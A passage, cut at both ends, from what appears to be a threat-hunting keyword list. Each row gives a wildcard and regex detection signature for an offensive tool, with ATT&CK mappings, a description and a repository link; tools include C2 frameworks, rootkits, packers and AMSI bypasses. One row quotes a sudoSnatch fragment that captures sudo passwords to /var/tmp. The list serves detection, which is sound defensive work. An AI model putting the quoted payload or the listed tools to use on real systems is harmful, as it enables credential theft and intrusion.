all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg-0.3.zip*",".{0,1000}Nidhogg\-0\.3\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg-0.4.zip*",".{0,1000}Nidhogg\-0\.4\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg-0.5.zip*",".{0,1000}Nidhogg\-0\.5\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*NidhoggClient.exe *",".{0,1000}NidhoggClient\.exe\s.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*NidhoggExample.cpp*",".{0,1000}NidhoggExample\.cpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg-master*",".{0,1000}Nidhogg\-master.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","1","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*nIFS=* read -s pass\necho -e *User=*$(whoami)*Password=*$pass*> /var/tmp*",".{0,1000}nIFS\=.{0,1000}\sread\s\-s\spass\\necho\s\-e\s.{0,1000}User\=.{0,1000}\$\(whoami\).{0,1000}Password\=.{0,1000}\$pass.{0,1000}\>\s\/var\/tmp.{0,1000}","offensive_tool_keyword","sudoSnatch","sudoSnatch payload grabs sudo password in plain text and imediately after target uses sudo command and sends it back to attacker remotely/locally.","T1552.001 - T1056.001 - T1071.001","TA0006 - TA0004 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SudoSnatch","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*nightCrawler.ps1 *",".{0,1000}nightCrawler\.ps1\s.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*Nightmangle-master*",".{0,1000}Nightmangle\-master.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","117","14","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*nikto -C all *",".{0,1000}nikto\s\-C\sall\s.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "*nikto/program*",".{0,1000}nikto\/program.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7885","1156","2024-05-01T02:01:39Z","2012-11-24T04:24:29Z" "*NimBlackout*.exe*",".{0,1000}NimBlackout.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*NimBlackout.*",".{0,1000}NimBlackout\..{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*NimBlackout-main*",".{0,1000}NimBlackout\-main.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*nimbo_main*",".{0,1000}nimbo_main.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*nimbo_prompt_color*",".{0,1000}nimbo_prompt_color.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*nimbo_root*",".{0,1000}nimbo_root.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*Nimbo-C2 w1ll r0ck y0ur w0rld*",".{0,1000}Nimbo\-C2\sw1ll\sr0ck\sy0ur\sw0rld.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*Nimbo-C2*",".{0,1000}Nimbo\-C2.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*Nimbo-C2.*",".{0,1000}Nimbo\-C2\..{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*nimbo-dependencies*",".{0,1000}nimbo\-dependencies.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*nimbuspwn.py*",".{0,1000}nimbuspwn\.py.{0,1000}","offensive_tool_keyword","POC","This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800)","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/Immersive-Labs-Sec/nimbuspwn","1","1","N/A","N/A","1","22","7","2022-05-05T10:02:27Z","2022-04-27T13:04:33Z" "*nimcrypt -*",".{0,1000}nimcrypt\s\-.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","8","707","118","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "*nimcrypt --file *",".{0,1000}nimcrypt\s\-\-file\s.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","1","90","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" "*nimcrypt.nim*",".{0,1000}nimcrypt\.nim.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","8","707","118","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "*NimDllSideload-main*",".{0,1000}NimDllSideload\-main.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*NimExec.exe*",".{0,1000}NimExec\.exe.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","357","39","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z" "*NimExec-master*",".{0,1000}NimExec\-master.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","357","39","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z" "*NimPlant v*",".{0,1000}NimPlant\sv.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*nimplant-*",".{0,1000}nimplant\-.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*NimPlant*.tar.gz*",".{0,1000}NimPlant.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*NimPlant*.zip*",".{0,1000}NimPlant.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*nimplant.db*",".{0,1000}nimplant\.db.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*NimPlant.dll*",".{0,1000}NimPlant\.dll.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*NimPlant.nim*",".{0,1000}NimPlant\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*NimPlant.nimble*",".{0,1000}NimPlant\.nimble.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*NimPlant.py*",".{0,1000}NimPlant\.py.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*nimplantPrint*",".{0,1000}nimplantPrint.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*nimplants-*.js*",".{0,1000}nimplants\-.{0,1000}\.js.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*nimplants.html*",".{0,1000}nimplants\.html.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*NimShellCodeLoader*",".{0,1000}NimShellCodeLoader.{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","594","111","2023-12-28T15:23:19Z","2021-01-19T15:57:01Z" "*NimSyscallLoader -*",".{0,1000}NimSyscallLoader\s\-.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*Ninja c2*",".{0,1000}Ninja\sc2.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*ninjac2*",".{0,1000}ninjac2.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*nipe.pl *",".{0,1000}nipe\.pl\s.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway. Tor enables users to surf the internet. chat and send instant messages anonymously. and is used by a wide variety of people for both licit and illicit purposes. Tor has. for example. been used by criminals enterprises. hacktivism groups. and law enforcement agencies at cross purposes. sometimes simultaneously. Nipe is a script to make the Tor network your default gateway.This Perl script enables you to directly route all your traffic from your computer to the Tor network through which you can surf the internet anonymously without having to worry about being tracked or traced back.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","0","N/A","N/A","10","1833","307","2024-01-28T17:07:21Z","2015-09-07T18:47:10Z" "*nircmdc.exe savescreenshot*",".{0,1000}nircmdc\.exe\ssavescreenshot.{0,1000}","offensive_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*nirsoft.net/utils/browsing_history_view.html*",".{0,1000}nirsoft\.net\/utils\/browsing_history_view\.html.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*nishang.exe*",".{0,1000}nishang\.exe.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*nishang.ps1*",".{0,1000}nishang\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*nishang.psm1*",".{0,1000}nishang\.psm1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Nishang.psm1*",".{0,1000}Nishang\.psm1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*nishang.psm1*",".{0,1000}nishang\.psm1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*nishang-0-3-4.html*",".{0,1000}nishang\-0\-3\-4\.html.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Nishang-all-in-one*",".{0,1000}Nishang\-all\-in\-one.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*NixImports by dr4k0nia*",".{0,1000}NixImports\sby\sdr4k0nia.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - 